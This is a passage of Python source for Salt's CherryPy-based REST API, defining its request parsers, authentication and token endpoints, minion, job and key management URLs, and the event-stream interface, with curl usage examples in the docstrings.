For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
cherrypy.serving.request.unserialized_data = dict(parse_qsl(urlencoded))
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if "return" in returns[minion]:
minion_ret[minion] = returns[minion].get("return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{}', and user '{}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n" # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield "tag: {}\n".format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield "data: {}\n\n".format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
